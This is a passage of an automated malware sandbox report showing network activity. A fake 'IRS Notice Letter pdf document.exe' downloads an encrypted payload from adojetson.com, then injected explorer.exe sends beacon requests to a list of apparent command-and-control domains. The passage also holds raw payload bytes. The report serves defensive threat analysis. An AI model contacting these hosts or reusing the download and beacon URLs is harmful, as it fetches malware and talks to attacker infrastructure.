                                                                          Jan 11, 2021 16:25:08.863886118 CET6172153192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:25:08.938981056 CET53617218.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:25:13.948646069 CET5125553192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:25:14.312964916 CET53512558.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:25:19.726453066 CET6152253192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:25:20.187546015 CET53615228.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:25:25.863914013 CET5233753192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:25:25.938337088 CET53523378.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:25:31.220172882 CET5504653192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:25:31.276551008 CET53550468.8.8.8192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Jan 11, 2021 16:23:14.129580021 CET192.168.2.48.8.8.80xd268Standard query (0)adojetson.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:06.476883888 CET192.168.2.48.8.8.80xb469Standard query (0)www.rappaportcos.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:11.567560911 CET192.168.2.48.8.8.80x5723Standard query (0)www.emuprising.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:21.866880894 CET192.168.2.48.8.8.80x5922Standard query (0)www.myaarpdentalpln.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:27.274300098 CET192.168.2.48.8.8.80x2045Standard query (0)www.stereoslide.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:32.450069904 CET192.168.2.48.8.8.80x716dStandard query (0)www.alessandrabortolussi.netA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:37.728318930 CET192.168.2.48.8.8.80x53fbStandard query (0)www.prendimiconcept.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:42.882637978 CET192.168.2.48.8.8.80x27c7Standard query (0)www.lobstermenforgolden.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:47.984529972 CET192.168.2.48.8.8.80x99e9Standard query (0)www.kobumsnetwork.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:53.202550888 CET192.168.2.48.8.8.80xeefaStandard query (0)www.rednbot.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:58.479343891 CET192.168.2.48.8.8.80x9eb0Standard query (0)www.austinscubaschool.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:03.605534077 CET192.168.2.48.8.8.80x7f82Standard query (0)www.wendyallegaert.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:08.863886118 CET192.168.2.48.8.8.80xc56eStandard query (0)www.virginiadoyle.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:13.948646069 CET192.168.2.48.8.8.80xd217Standard query (0)www.aksaystudios.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:19.726453066 CET192.168.2.48.8.8.80x5cadStandard query (0)www.aizimov.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:25.863914013 CET192.168.2.48.8.8.80x77f8Standard query (0)www.thebuzztraders.comA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:31.220172882 CET192.168.2.48.8.8.80x25b5Standard query (0)www.rappaportcos.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jan 11, 2021 16:23:14.350569010 CET8.8.8.8192.168.2.40xd268No error (0)adojetson.com198.187.29.67A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:23:14.350569010 CET8.8.8.8192.168.2.40xd268No error (0)adojetson.com192.95.36.134A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:06.545897961 CET8.8.8.8192.168.2.40xb469Name error (3)www.rappaportcos.comnonenoneA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:11.634740114 CET8.8.8.8192.168.2.40x5723No error (0)www.emuprising.comemuprising.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:24:11.634740114 CET8.8.8.8192.168.2.40x5723No error (0)emuprising.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:22.008053064 CET8.8.8.8192.168.2.40x5922No error (0)www.myaarpdentalpln.com199.59.242.153A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:27.434158087 CET8.8.8.8192.168.2.40x2045No error (0)www.stereoslide.comstereoslide.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:24:32.512212992 CET8.8.8.8192.168.2.40x716dNo error (0)www.alessandrabortolussi.netalessandrabortolussi.netCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:24:32.512212992 CET8.8.8.8192.168.2.40x716dNo error (0)alessandrabortolussi.net34.102.136.180A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:37.877690077 CET8.8.8.8192.168.2.40x53fbServer failure (2)www.prendimiconcept.comnonenoneA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:42.963098049 CET8.8.8.8192.168.2.40x27c7Name error (3)www.lobstermenforgolden.comnonenoneA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:48.069564104 CET8.8.8.8192.168.2.40x99e9No error (0)www.kobumsnetwork.com172.67.209.95A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:48.069564104 CET8.8.8.8192.168.2.40x99e9No error (0)www.kobumsnetwork.com104.24.111.68A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:48.069564104 CET8.8.8.8192.168.2.40x99e9No error (0)www.kobumsnetwork.com104.24.110.68A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:53.279584885 CET8.8.8.8192.168.2.40xeefaNo error (0)www.rednbot.comrednbot.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:24:53.279584885 CET8.8.8.8192.168.2.40xeefaNo error (0)rednbot.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:24:58.557437897 CET8.8.8.8192.168.2.40x9eb0Name error (3)www.austinscubaschool.comnonenoneA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:08.938981056 CET8.8.8.8192.168.2.40xc56eName error (3)www.virginiadoyle.comnonenoneA (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:14.312964916 CET8.8.8.8192.168.2.40xd217No error (0)www.aksaystudios.com147.255.30.94A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:20.187546015 CET8.8.8.8192.168.2.40x5cadNo error (0)www.aizimov.comaizimov.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:25:20.187546015 CET8.8.8.8192.168.2.40x5cadNo error (0)aizimov.com153.126.209.136A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:25.938337088 CET8.8.8.8192.168.2.40x77f8No error (0)www.thebuzztraders.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:25:25.938337088 CET8.8.8.8192.168.2.40x77f8No error (0)ghs.googlehosted.com216.58.207.179A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:31.276551008 CET8.8.8.8192.168.2.40x25b5Name error (3)www.rappaportcos.comnonenoneA (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • adojetson.com
                                                                          • www.emuprising.com
                                                                          • www.myaarpdentalpln.com
                                                                          • www.alessandrabortolussi.net
                                                                          • www.kobumsnetwork.com
                                                                          • www.rednbot.com
                                                                          • www.aksaystudios.com
                                                                          • www.aizimov.com
                                                                          • www.thebuzztraders.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.449730198.187.29.6780C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:23:14.564799070 CET168OUTGET /vc/xdark_GOaIsqF182.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                          Host: adojetson.com
                                                                          Cache-Control: no-cache
                                                                          Jan 11, 2021 16:23:14.758521080 CET169INHTTP/1.1 200 OK
                                                                          Date: Mon, 11 Jan 2021 15:23:14 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Thu, 07 Jan 2021 17:20:22 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 164928
                                                                          Content-Type: application/octet-stream
                                                                          Data Raw: 92 5d 85 49 84 d6 15 31 8f bf 03 9d 31 64 1b 1a 0b 61 ab 1f f7 a1 57 45 e4 db 1f 82 26 03 a0 4e f2 4c 85 0c ed ca ee 52 b3 31 49 94 a9 46 f2 e9 77 8e e9 12 72 e8 26 a4 d1 4d 61 14 03 f9 07 86 8c cb d4 03 d9 d2 27 75 8c 16 67 fb d7 87 5f f5 14 b5 b2 d2 5f 0c ac 37 49 48 59 b0 56 10 98 85 4b ef ea d0 8a f6 88 d0 0b bb 23 37 2d a7 4f 3f 9c a3 da 25 26 6c 76 d8 91 d9 f3 e2 56 f8 f0 4b 4f ff 2a d9 5a ab db ad c2 48 68 05 fc 99 65 77 f9 77 47 07 1d ba 4b ca 13 2a 0e 79 6d 5f 69 25 18 1c 40 b7 0f fc 5d 04 34 57 74 5b d4 2a 8c eb e4 1c 11 f7 99 41 91 7f 64 28 dd 2c f4 cf 1e 4d 00 99 c2 99 e3 62 3f 16 2d a8 1e 93 ee 8a d3 04 d3 46 15 2d 99 6f 1d 76 b7 79 ed c7 68 8f cb 11 43 54 fd 39 60 0b e9 44 10 a1 31 da 13 b2 eb b6 65 a2 47 67 55 8e ce 22 8a 1e 83 78 86 cf c6 37 01 02 db 95 ae 34 62 98 63 d2 07 17 c7 45 d7 a0 9d 85 5d 4b ca 10 9e 3b 52 66 b9 d3 d1 98 0d 3b bf ae 5a ac 66 b4 dd a1 24 d9 46 b9 7b 6a 84 f6 a1 a9 d8 2f 0f 87 27 d3 91 74 fe e6 98 49 94 cf e2 ed 14 6e 11 dc 24 b3 36 43 08 27 04 14 9c c6 dd ab 87 c0 26 80 e1 e3 cf ed 00 1c 7f 35 c7 a4 9d ed 76 60 55 e0 dc 12 1e d4 aa 60 ce 2f 4d 48 74 83 23 18 7c 9d 8a 82 f5 e8 21 0c c0 e9 1d f3 3a 6e 5d 48 d7 72 41 67 93 04 7b b9 c5 fe 6a 6d dd 17 9e ef f7 a1 ab 85 68 9e f7 6e 56 6e f9 de 9f 49 8d d0 75 99 de b7 9e 32 7e 94 f9 3f e5 22 19 d5 6b 25 fb 70 dc ce dd be 81 14 e5 ff 28 7e 8a 82 a3 95 74 ee 08 e2 f6 e6 da 73 51 be bf b2 83 2c e3 ca 2d 92 83 72 87 dd 58 29 57 22 70 94 39 9e 97 13 e5 78 3c b6 be 9f e4 60 43 4b 54 b6 91 4c eb f5 55 0e 49 39 20 d4 91 dd f3 11 bd 6c e9 bb eb fb 4a 32 c3 e2 08 79 17 0e 25 34 70 5c c7 4b a3 58 b6 aa ab 53 13 18 e8 40 06 33 de b4 91 d2 b8 d1 ec ab 3e 57 ac d6 9b d1 0d 4b 48 58 55 30 54 a8 fb 57 8a 5a 12 9b ee 26 a1 17 04 e1 15 37 2d 65 99 99 50 36 0b 5a ab 40 98 a6 13 93 3b c9 da 7f c5 2d c7 cd 1e 3c 30 e6 9d b7 b3 d5 f6 d1 de 7b 38 c2 ca d1 70 0c 6c 1e 2c 67 85 68 96 3d 68 b2 29 e9 20 4e c0 2f a1 37 81 15 96 95 9a 8f 9e 8c 62 c5 f3 89 e9 74 24 1f b9 d7 0a 60 b4 1a a1 1d 52 cb 2c 8d c8 83 fe 1e 65 1a ff 2c c0 0f d0 c4 3d 81 31 82 2e dd c1 a7 6d 2d 60 38 a8 6c f8 81 15 58 ac 5b 11 10 89 30 aa 3f 60 57 d4 6e fb 81 8a b4 63 9d fb a0 55 41 06 e1 f1 3a 6f 16 92 02 c8 e8 b0 47 0f 68 f7 57 45 cf ea 55 24 1b 39 2f d6 89 61 3a f4 e8 35 df 58 5b e6 b8 7a 3e 72 d1 98 1b 56 e8 b0 60 8d cb 14 8f 68 7b 28 f6 41 10 cb c5 24 83 5c d4 4a 35 9a bd 48 22 37 6e bd f3 d5 be 14 90 0e 01 ce 72 d0 80 3f d6 85 8d 88 a6 20 96 4a ff 7d 1d 77 60 af 21 0e df 51 ca 02 46 25 d7 99 2d 63 13 15 d6 96 17 69 7a 96 bb 8d 61 70 8f 09 f9 84 0e 1f cb 51 3b 0b f8 c9 50 2c 26 87 b9 cd f5 67 6f ee a0 d3 99 60 de cf a9 ea 77 c4 08 a4 d1 58 6a 3c 11 96 e5 02 83 f5 81 04 f7 d0 d1 3b 9a 0e e1 7a c9 fc 23 33 7b be 98 45 db a0 32 28 52 23 74 04 95 91 5d af 5b 06 c1 91 91 51 31 d2 27 75 8c 4e e4 13 de 0c 97 76 d4 89 39 d2 5c cd 2f f7 61 4b 51 4f b7 80 98 85 4b ef ea d0 8a f6 88 d0 0b bb 23 37 2d a7 4f 3f 9c a3 da 25 26 6c 76 d8 91 d9 f3 e2 ee f8 f0 4b 41 e0 90 d7 5a 1f d2 60 e3 f0 69 49 31 b8 31 1f 90 04 67 77 6f d5 2c b8 72 47 2e 1a 0c 31 07 4a 6c 3c 22 d2 2f 8e 28 6a 14 3e 1a 7b 90 65 df cb 89 73 75 92 b7 4c 9c 75 40 28 dd 2c f4 cf 1e 4d 7d ff fd 82 da 65 6e 5e 14 af 4f db d7 8d 82 4c f1 dc ef 65 ec 68 4c 3e 95 e3 22 8f 52 88 9a 59 61 ce 31 71 58 0c b8 0c 42 c8 52 b2 2a b5 ba fe 65 a2 47 67 55 8e ce 22 da 5b 83 78 ca ce c7 37 78 bf 38 aa ae 34 62 98 63 d2 07 17 27 45 d5 a1 96 84 57 4b ca 62 9c 3b 52 66 b9 d3 d1
                                                                          Data Ascii: ]I11daWE&NLR1IFwr&Ma'ug__7IHYVK#7-O?%&lvVKO*ZHhewwGK*ym_i%@]4Wt[*Ad(,Mb?-F-ovyhCT9`D1eGgU"x74bcE]K;Rf;Zf$F{j/'tIn$6C'&5v`U`/MHt#|!:n]HrAg{jmhnVnIu2~?"k%p(~tsQ,-rX)W"p9x<`CKTLUI9 lJ2y%4p\KXS@3>WKHXU0TWZ&7-eP6Z@;-<0{8pl,gh=h) N/7bt$`R,e,=1.m-`8lX[0?`WncUA:oGhWEU$9/a:5X[z>rV`h{(A$\J5H"7nr? J}w`!QF%-cizapQ;P,&go`wXj<;z#3{E2(R#t][Q1'uNv9\/aKQOK#7-O?%&lvKAZ`iI11gwo,rG.1Jl<"/(j>{esuLu@(,M}en^OLehL>"RYa1qXBR*eGgU"[x7x84bc'EWKb;Rf


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.44973234.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:24:11.679864883 CET354OUTGET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.emuprising.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:24:11.818809986 CET355INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:11 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd4972f-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.449733199.59.242.15380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:24:22.133837938 CET357OUTGET /09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.myaarpdentalpln.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:24:22.256963968 CET358INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_U5TM9ad0yUw8X7quF8IXqAruBwRglx0Tf2oRLDnMqfZ3M3O+8W2I/3XD5vfWqkj5jHKJswCAl4Tl2M+Uu54Fjw==
                                                                          Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 55 35 54 4d 39 61 64 30 79 55 77 38 58 37 71 75 46 38 49 58 71 41 72 75 42 77 52 67 6c 78 30 54 66 32 6f 52 4c 44 6e 4d 71 66 5a 33 4d 33 4f 2b 38 57 32 49 2f 33 58 44 35 76 66 57 71 6b 6a 35 6a 48 4b 4a 73 77 43 41 6c 34 54 6c 32 4d 2b 55 75 35 34 46 6a 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                          Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_U5TM9ad0yUw8X7quF8IXqAruBwRglx0Tf2oRLDnMqfZ3M3O+8W2I/3XD5vfWqkj5jHKJswCAl4Tl2M+Uu54Fjw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.44973434.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:24:32.555069923 CET365OUTGET /09rb/?Jt78=kPRwpjmi7xHhdB/QktvvK7WyLyDr49juN0w/BSnfKghxj4qCtVdYSmPoUBccxdfkW2C+&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.alessandrabortolussi.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:24:32.693470001 CET366INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:32 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd494f7-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.449735172.67.209.9580C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:24:48.117661953 CET369OUTGET /09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.kobumsnetwork.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:24:48.172992945 CET369INHTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 11 Jan 2021 15:24:48 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Mon, 11 Jan 2021 16:24:48 GMT
                                                                          Location: https://www.kobumsnetwork.com/09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS
                                                                          cf-request-id: 0793a5ce9a00000bf5fd859000000001
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=osL7dKwEvBolDuwOyAAVjWZRbwV1mIhWDQMVxmYU1FMunCTXf9JwcGVACORrPg%2BGmdwjmCHKulm7mSkJbcAjy2PuMNW0Tsx6HPxSk6nKYGm3bOB9lFU%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 60ffa590ff710bf5-AMS
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          5192.168.2.44973634.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:24:53.322417021 CET370OUTGET /09rb/?Jt78=GzMG1eSemGLMBHrXmbkE5oZCgXo7nbeyHhmTYulGjAFIODDsopduu5ndU/Um1KPjDO6l&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.rednbot.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:24:53.460947990 CET371INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:53 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd4972f-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
